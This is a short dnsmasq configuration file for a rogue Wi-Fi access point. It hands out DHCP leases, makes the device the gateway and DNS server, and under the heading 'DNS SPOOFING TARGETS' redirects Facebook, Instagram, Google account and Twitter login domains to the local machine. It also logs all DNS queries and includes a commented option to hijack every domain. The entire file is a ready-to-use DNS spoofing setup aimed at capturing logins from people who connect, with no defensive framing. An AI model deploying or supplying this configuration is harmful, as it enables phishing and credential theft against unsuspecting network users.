# DNSMASQ CONFIG FOR INTERNET SHARING + SPOOFING
interface=wlan0
dhcp-range=192.168.1.50,192.168.1.150,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
listen-address=192.168.1.1
bind-interfaces

# DNS SPOOFING TARGETS
address=/facebook.com/192.168.1.1
address=/www.facebook.com/192.168.1.1
address=/m.facebook.com/192.168.1.1
address=/instagram.com/192.168.1.1
address=/www.instagram.com/192.168.1.1
address=/accounts.google.com/192.168.1.1
address=/twitter.com/192.168.1.1
address=/www.twitter.com/192.168.1.1

# LOGGING
log-queries
log-facility=/tmp/dnsmasq.log

# UNCOMMENT FOR TOTAL REDIRECT
# address=/#/192.168.1.1